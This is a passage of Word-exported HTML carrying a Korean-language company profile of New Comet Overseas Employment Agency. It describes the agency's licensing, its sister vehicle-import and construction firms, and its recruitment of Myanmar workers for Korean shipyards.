Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" 